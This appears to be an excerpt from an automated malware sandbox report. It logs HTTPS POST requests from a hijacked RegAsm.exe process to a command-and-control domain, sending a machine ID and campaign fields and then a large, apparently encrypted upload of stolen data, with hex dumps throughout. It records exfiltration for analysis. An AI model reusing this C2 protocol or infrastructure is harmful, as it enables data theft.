                                                                                        Data Ascii: --XQBYBEG863Content-Disposition: form-data; name="hwid"BDB1EF992B1E438FCEC5E79E34E047A9--XQBYBEG863Content-Disposition: form-data; name="pid"2--XQBYBEG863Content-Disposition: form-data; name="lid"yau6Na--6928154717--XQBYBEG863Con
                                                                                        2024-11-14 07:08:28 UTC1012INHTTP/1.1 200 OK
                                                                                        Date: Thu, 14 Nov 2024 07:08:27 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=1hvob2gvs4s7k3mr3aisco0d6m; expires=Mon, 10-Mar-2025 00:55:06 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nb1UrWcJIgBRa8xyTPqwN3KO1qwnlgzOsH3LLN2Scs4HfYopWhwfLhqYuZ5XN65ck36dnwYCW2U6u%2BNguYlYumFAvzIsJmVHPNqsadLhn8tJgzsPCHDR9qPbV72qhxPZAW6pnpY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e252ba02c548785-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1207&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13726&delivery_rate=2389438&cwnd=252&unsent_bytes=0&cid=065fb19f9ddc9e20&ts=558&x=0"
                                                                                        2024-11-14 07:08:28 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.91
                                                                                        2024-11-14 07:08:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.549710188.114.96.34436484C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-14 07:08:28 UTC281OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=K2WH2DKYB9DNNTZ
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 15064
                                                                                        Host: marshal-zhukov.com
                                                                                        2024-11-14 07:08:28 UTC15064OUTData Raw: 2d 2d 4b 32 57 48 32 44 4b 59 42 39 44 4e 4e 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 42 31 45 46 39 39 32 42 31 45 34 33 38 46 43 45 43 35 45 37 39 45 33 34 45 30 34 37 41 39 0d 0a 2d 2d 4b 32 57 48 32 44 4b 59 42 39 44 4e 4e 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 32 57 48 32 44 4b 59 42 39 44 4e 4e 54 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d
                                                                                        Data Ascii: --K2WH2DKYB9DNNTZContent-Disposition: form-data; name="hwid"BDB1EF992B1E438FCEC5E79E34E047A9--K2WH2DKYB9DNNTZContent-Disposition: form-data; name="pid"2--K2WH2DKYB9DNNTZContent-Disposition: form-data; name="lid"yau6Na--6928154717--
                                                                                        2024-11-14 07:08:29 UTC1013INHTTP/1.1 200 OK
                                                                                        Date: Thu, 14 Nov 2024 07:08:29 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=c53ddp6kpv51ne7nccku39i3u6; expires=Mon, 10-Mar-2025 00:55:08 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rl0LeTSUSPcJxt59kwRs1p1Blpt7m00fkInL5sg8rzkYFgkKVH78Rb6hExmD9Xc4nVt2EOhM2gAOgkU2A3cE7AlGCSNyyRTIBwiDsHJ1zxXrd9JkEXh%2FbvgOUswbygBvglx5yAs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e252ba78f3c3aa6-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1236&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16003&delivery_rate=2203957&cwnd=251&unsent_bytes=0&cid=f4a468bc2aa1760b&ts=561&x=0"
                                                                                        2024-11-14 07:08:29 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.91
                                                                                        2024-11-14 07:08:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.549711188.114.96.34436484C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-14 07:08:30 UTC275OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=P24M2DAMO
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 20518
                                                                                        Host: marshal-zhukov.com
                                                                                        2024-11-14 07:08:30 UTC15331OUTData Raw: 2d 2d 50 32 34 4d 32 44 41 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 42 31 45 46 39 39 32 42 31 45 34 33 38 46 43 45 43 35 45 37 39 45 33 34 45 30 34 37 41 39 0d 0a 2d 2d 50 32 34 4d 32 44 41 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 50 32 34 4d 32 44 41 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 50 32 34 4d 32 44 41 4d 4f 0d 0a 43 6f 6e 74 65 6e 74
                                                                                        Data Ascii: --P24M2DAMOContent-Disposition: form-data; name="hwid"BDB1EF992B1E438FCEC5E79E34E047A9--P24M2DAMOContent-Disposition: form-data; name="pid"3--P24M2DAMOContent-Disposition: form-data; name="lid"yau6Na--6928154717--P24M2DAMOContent
                                                                                        2024-11-14 07:08:30 UTC5187OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: un 4F([:7s~X`nO`i
                                                                                        2024-11-14 07:08:30 UTC1023INHTTP/1.1 200 OK
                                                                                        Date: Thu, 14 Nov 2024 07:08:30 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=iq01r9dc2088fd2584hj140eeq; expires=Mon, 10-Mar-2025 00:55:09 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aFzETtfOxsC8ZE5sl9YwiGUjyqipAZq%2BRwhl0V%2Fx8auh71U2umQNu%2BmEVFBleyvOHEl17l2wuOwB6jodJHg4BSGrtkpH%2B7jf3aG5KygyZ8lFvPRP%2FvH%2Fi51IGktmj1KxSjlsJM0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e252bb06baa464d-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1129&sent=12&recv=27&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21473&delivery_rate=2429530&cwnd=251&unsent_bytes=0&cid=7c3c624f70271fbd&ts=540&x=0"
                                                                                        2024-11-14 07:08:30 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.91
                                                                                        2024-11-14 07:08:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.549712188.114.96.34436484C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-14 07:08:31 UTC284OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=D8I0HQKDVAZZVINLCED
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1267
                                                                                        Host: marshal-zhukov.com
                                                                                        2024-11-14 07:08:31 UTC1267OUTData Raw: 2d 2d 44 38 49 30 48 51 4b 44 56 41 5a 5a 56 49 4e 4c 43 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 42 31 45 46 39 39 32 42 31 45 34 33 38 46 43 45 43 35 45 37 39 45 33 34 45 30 34 37 41 39 0d 0a 2d 2d 44 38 49 30 48 51 4b 44 56 41 5a 5a 56 49 4e 4c 43 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 38 49 30 48 51 4b 44 56 41 5a 5a 56 49 4e 4c 43 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39
                                                                                        Data Ascii: --D8I0HQKDVAZZVINLCEDContent-Disposition: form-data; name="hwid"BDB1EF992B1E438FCEC5E79E34E047A9--D8I0HQKDVAZZVINLCEDContent-Disposition: form-data; name="pid"1--D8I0HQKDVAZZVINLCEDContent-Disposition: form-data; name="lid"yau6Na--69
                                                                                        2024-11-14 07:08:31 UTC1016INHTTP/1.1 200 OK
                                                                                        Date: Thu, 14 Nov 2024 07:08:31 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=qs6u77trerltdjsjo4nkau7819; expires=Mon, 10-Mar-2025 00:55:10 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cgqVI%2Fz6tbMRT2EoR%2FH5gjQAdgoy2ah750bbv%2BD5Q6DuJScnV6D3CHlNAxi9HiDCCWSiqvF1tyHbILYURNnFYOGDHLcHTXLFGUtspWeacN6KSKbltED3NwxtXqrzwCsRSTB3%2BXE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e252bb92fd0478b-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1707&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2187&delivery_rate=1654857&cwnd=251&unsent_bytes=0&cid=ec16050eb9fb99fc&ts=563&x=0"
                                                                                        2024-11-14 07:08:31 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.91
                                                                                        2024-11-14 07:08:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.549713188.114.96.34436484C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-14 07:08:32 UTC275OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=8FZDPWUZ
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 586109
                                                                                        Host: marshal-zhukov.com
                                                                                        2024-11-14 07:08:32 UTC15331OUTData Raw: 2d 2d 38 46 5a 44 50 57 55 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 42 31 45 46 39 39 32 42 31 45 34 33 38 46 43 45 43 35 45 37 39 45 33 34 45 30 34 37 41 39 0d 0a 2d 2d 38 46 5a 44 50 57 55 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 46 5a 44 50 57 55 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 38 46 5a 44 50 57 55 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                        Data Ascii: --8FZDPWUZContent-Disposition: form-data; name="hwid"BDB1EF992B1E438FCEC5E79E34E047A9--8FZDPWUZContent-Disposition: form-data; name="pid"1--8FZDPWUZContent-Disposition: form-data; name="lid"yau6Na--6928154717--8FZDPWUZContent-Dis
                                                                                        2024-11-14 07:08:32 UTC15331OUTData Raw: 98 c6 ed 0a d1 75 8d fa 6d e6 d6 23 09 01 79 b1 65 2c e1 5e a8 b9 5e 80 30 49 8a 54 69 f2 2e b0 b4 6c e7 7e 79 5a b9 49 90 90 de f9 ea 71 21 0b 23 55 d8 f7 e0 13 e6 bb 42 87 3e 2e 4f 9c 56 8e ae 12 04 62 95 93 cf f3 01 75 aa 01 ab 5d 7e 6a c1 a1 d7 e0 d7 d3 d5 4a d7 ff e4 50 b0 38 67 e4 f5 83 50 57 51 d6 e2 6f 6a fb 63 f8 a3 13 0c e0 8b f2 ad b6 07 e5 6d 90 9f fb 05 ec dc 98 1d cf 74 59 ff f3 07 65 ee cc 2a bf bb 95 c0 64 37 24 8f 8c de 1b 7b c0 7e a4 ab d4 29 b0 37 ff 2d b4 1d 75 79 0c d8 25 5f fe b7 a1 b3 ae 1a e1 07 1d 60 0e 87 88 4d 6a 3e 02 38 5e 89 00 49 a6 69 83 39 1a eb 9f cc 2a a0 04 48 a2 b8 3b 28 21 fb e3 e0 ad 4d ca 85 4e 3b 88 b9 4f ae 5f 18 38 3e c8 74 f6 c1 81 96 f9 4d 6f 0b 74 bc e4 53 e7 72 48 49 03 a6 4a f2 4b 75 69 41 9b ef d3 22 13 3f
                                                                                        Data Ascii: um#ye,^^0ITi.l~yZIq!#UB>.OVbu]~jJP8gPWQojcmtYe*d7${~)7-uy%_`Mj>8^Ii9*H;(!MN;O_8>tMotSrHIJKuiA"?
                                                                                        2024-11-14 07:08:32 UTC15331OUTData Raw: 3e ae 9b e7 20 c2 73 5d 16 7d 9e a3 8b 3a ba 26 cb bc b0 b3 1d fd d7 1e 42 36 6d 81 d8 f6 c1 5c ea d7 a8 12 5d ec 6d 3e 65 56 d0 57 00 9c dd a6 07 b9 77 76 cc 30 9c 36 2b 07 96 2a 77 2c d8 1f e0 b5 0f 05 8f 27 2e dc 54 bc 4c af 5b 9f 5f 1c 34 d3 5b 5c d1 a1 ff d1 02 88 9d 8b 51 47 b4 82 72 32 fd 5f 98 6c 4c 3d 75 be 3a 9c a0 b2 b7 7a a6 be db 64 4f 56 d5 36 34 fc 80 41 a4 24 a1 40 bc 99 57 5b 8d f5 20 43 9e 1b ca eb a6 0f fd ef 39 95 a7 01 7d f7 6f ed f1 d0 0b 02 11 17 40 f8 d0 cd 70 0f c0 96 7d 0a c0 49 33 d0 1f 0e fa af cf f8 20 df 16 03 0a cf 89 db fc bf 87 f3 24 1d 15 b0 79 2d 8a a0 67 41 a8 b1 a2 89 21 00 f0 18 e1 66 90 d5 50 5b dd d4 58 8e 0e 60 3e a8 19 a9 b5 e6 60 65 69 b8 11 29 b0 ea a1 65 7e 7e ee c4 ee 69 1d 9f a0 3b a3 3b c5 69 58 b8 ba b9 e8
                                                                                        Data Ascii: > s]}:&B6m\]m>eVWwv06+*w,'.TL[_4[\QGr2_lL=u:zdOV64A$@W[ C9}o@p}I3 $y-gA!fP[X`>`ei)e~~i;;iX
                                                                                        2024-11-14 07:08:32 UTC15331OUTData Raw: 95 bf 2a dd cb 04 ed 65 82 c5 d2 76 4c 21 07 60 a9 93 1d 5a 03 78 94 6d d4 27 56 54 10 e4 a2 3e 88 54 8c 17 47 ef d9 cd 2e 3c ca e4 3b 7c 64 bc 82 ae 30 d3 92 25 af a4 e0 1c e6 00 ae c0 32 eb 8c fc 05 1c 62 7b 8d 41 83 cb 2d 84 df 3d fa 99 ed 64 ae 53 aa 07 4f f2 53 38 ad 2b 4c 8a 03 ff c2 ca 57 ec c6 4a fd ab 03 56 cb 2a be a9 92 b6 d4 02 1c 53 aa 9f 9f 7c f0 83 73 10 1c 09 b9 24 02 78 9b 32 48 a4 21 41 1a d8 a5 5c cc 08 14 6a b2 37 76 54 f3 cd 0a b2 94 ae e9 2e 03 84 fd db 5a 51 f3 ec 85 12 c1 d7 62 40 f4 e0 d5 11 47 65 b0 d1 c3 09 e6 48 72 57 67 7d 8a 3e b0 a6 85 38 5b e8 8a 75 55 6a 59 0e 37 f2 9b 5f cf 67 f6 64 c1 7c 6b b0 59 bd f7 1f ae c1 57 6e 7c 8f 00 4d 15 f4 14 de 9e 7c 6b 94 7a 32 5b a4 9e 2d 59 ae 4e 7c 4b af b5 69 5c 7c 99 ba f6 c4 ac f8 b7
                                                                                        Data Ascii: *evL!`Zxm'VT>TG.<;|d0%2b{A-=dSOS8+LWJV*S|s$x2H!A\j7vT.ZQb@GeHrWg}>8[uUjY7_gd|kYWn|M|kz2[-YN|Ki\|
                                                                                        2024-11-14 07:08:32 UTC15331OUTData Raw: 42 30 36 66 0f c6 8b 75 91 81 6a 8f 09 35 35 2d 87 95 1e 8c 3a a9 20 b3 be af 7d ac 5a 9f 63 ea dd ae 8f e0 e3 0e 3a e1 3b de 7f 58 66 7b fe 13 03 2f bf fb 7a ce 44 76 ac cb 9d a2 cf a7 75 45 ee 3f d4 23 38 38 d0 7a 1a 6f 1e 22 0e ef 6f d6 08 27 1c 3c 3c f3 9b 76 d4 32 27 32 91 11 5f 60 2c 30 2e 56 63 af 9b b7 70 66 34 4b 5f c0 cb 57 43 3e 9a 7f 25 bf 43 fd f8 ee 76 38 5e 60 97 d6 e5 d3 c4 cc 08 fc f3 7b ed 5d b9 cb 9c 12 c1 13 f3 3e 97 9d a3 30 c3 d0 3d 79 8c a0 14 62 bd 21 33 98 5d ac 91 fb 42 0a 8f 39 07 f2 f6 08 46 29 53 2a 2e da f5 47 21 16 12 67 6b f5 15 bd ff ef 54 fd ff ef 02 a9 90 e5 09 98 10 1c 58 ad a3 29 fa 40 0b 0e 8d c7 f4 83 b7 ad 20 95 58 87 4b 40 20 38 67 d2 b8 7e 8e c0 26 dc 15 0d e0 2b 22 6b d1 dd 68 50 ca 53 9e 87 8f d2 48 fa e9 32 3c
                                                                                        Data Ascii: B06fuj55-: }Zc:;Xf{/zDvuE?#88zo"o'<<v2'2_`,0.Vcpf4K_WC>%Cv8^`{]>0=yb!3]B9F)S*.G!gkTX)@ XK@ 8g~&+"khPSH2<
                                                                                        2024-11-14 07:08:32 UTC15331OUTData Raw: a1 19 b5 c5 c2 f5 6f a6 07 c9 96 dc e7 9c 94 d2 fe 11 c2 9b 99 42 8d bd 52 6f 68 c9 bb 1d 75 2e df 2d 7e f7 5a 17 4d a6 eb 80 ba f0 98 d9 8b b3 d4 65 be a1 7c 54 f8 59 c2 a3 3d 1e 41 a9 48 13 85 aa 6b 3e ec e4 c1 b0 b1 d8 36 fb 21 03 1e 94 db 72 64 3d e5 b9 93 87 cf 46 72 0d f1 0c f5 f9 bb b8 93 af 47 05 70 c8 06 53 86 dc 58 55 02 26 2a 00 07 dc 9a cc 65 28 da 99 b0 87 26 be d0 44 5b 02 7d 7c 86 1a 04 41 dc ab c2 2b 87 a7 c6 02 49 fd aa 73 83 a1 46 4a 3f 9b 36 4c 41 a3 85 6a 62 48 3c 12 5b b2 22 a0 af 87 5c db bc e0 9b 3c 34 9b 14 b3 d3 b7 a8 ba f2 d3 3f 28 b5 97 ea 77 8d e4 94 56 f9 a0 b9 08 b2 7e 95 52 ba 5d 70 62 1f 0a 98 59 fd fd 8e 9e 6b 06 1a 03 4a 01 9c bb a2 56 fb 02 24 fa c7 3d 33 74 e2 09 71 8e 06 ab 9c 35 ad a2 3f c8 d9 84 f5 ee 3f 2c 05 b2 70
                                                                                        Data Ascii: oBRohu.-~ZMe|TY=AHk>6!rd=FrGpSXU&*e(&D[}|A+IsFJ?6LAjbH<["\<4?(wV~R]pbYkJV$=3tq5??,p
                                                                                        2024-11-14 07:08:32 UTC15331OUTData Raw: 38 8d 7f 89 5f 35 56 89 c6 b3 2c bc d6 7b 05 af b9 e3 c5 d7 2a 30 3c 62 19 e1 11 bd 2a b4 e4 20 c0 d0 36 c8 eb 3e 02 de 1f 55 15 58 58 9e 5c ce aa d1 8d c1 cc 5a 0e 9b 48 23 49 ff 52 52 d6 90 d7 99 2a 11 a2 74 cb e5 64 8a 11 c0 37 13 a9 15 b6 65 3e 67 63 89 55 87 b7 7b be 53 64 77 d2 5b 86 3b df 27 6a f9 96 7a 72 e6 dd 39 3e f4 a5 c5 cf 94 75 f7 77 3f d4 17 7f 02 52 86 0f 23 49 ff 05 82 b6 3f a0 f4 4a cf 8e 18 92 66 7e d7 cb e5 16 f0 30 d2 02 4b cd 9b f6 7e 13 df 39 42 c5 e4 4c 4c 88 29 0e b0 8b 6f 65 bc e8 cc d9 4c fe 6e ab 04 65 d9 64 78 7f f7 4d 47 81 3f 65 48 4e fe 9b ab 20 a3 cd 12 07 3e 8d 70 51 0b 4f 97 25 7e f6 bd 0d 97 a8 34 ff 00 a1 12 e6 9a 7f 30 ef a6 e8 dc 13 67 1c c3 68 fd ec b1 35 6b 96 c3 f3 fa 1b 9d 63 3b 56 81 77 5d d9 b2 e6 fb 8e fb 4c
                                                                                        Data Ascii: 8_5V,{*0<b* 6>UXX\ZH#IRR*td7e>gcU{Sdw[;'jzr9>uw?R#I?Jf~0K~9BLL)oeLnedxMG?eHN >pQO%~40gh5kc;Vw]L
                                                                                        2024-11-14 07:08:32 UTC15331OUTData Raw: df b1 ca f2 c1 ec e2 45 ca e2 b2 7a 20 f3 66 05 42 c8 8b c8 17 25 14 9c ea f4 2d 13 fc 08 d8 c9 d7 a7 f5 e4 97 9e 5a 50 8d 20 d2 b9 56 3b 24 3e 3d 64 41 bd 0d 07 bd 04 0c 0c 66 d6 3b 9a 59 8e 07 79 bb a4 c0 5e e6 d1 86 7a 77 40 d9 87 cf 88 8d 1e 10 01 85 d9 ab fe ad 47 cc 18 af 04 c0 9e 16 58 1d 9f 79 0c 38 89 63 03 9f 8a 75 cd f0 80 03 3c ae 58 e0 72 18 b6 07 76 a3 23 70 29 e6 a5 18 fe cc 3b da b7 51 1f b7 e8 57 5d 04 70 89 9d ae cc 7e 78 6d b0 c9 8c 80 b2 ff 4c e1 83 c6 8f 91 d1 1c ff fd 78 15 86 4a ab 89 5c fb 4f cc 0e c6 ad 0b 4a 58 80 49 93 6d 34 22 1b ac 3a 61 4e 01 b2 39 39 21 c9 53 82 72 12 a0 88 19 f2 d5 07 cc c9 97 c8 4c 65 28 c7 e0 f7 fd 81 b3 a6 a8 3a d5 ea d5 9b 8d 69 0e 77 f0 59 b1 d3 6b f6 40 0a 3c 9a 7d e9 85 04 89 a7 57 d0 4b 46 e3 f5 a7
                                                                                        Data Ascii: Ez fB%-ZP V;$>=dAf;Yy^zw@GXy8cu<Xrv#p);QW]p~xmLxJ\OJXIm4":aN99!SrLe(:iwYk@<}WKF
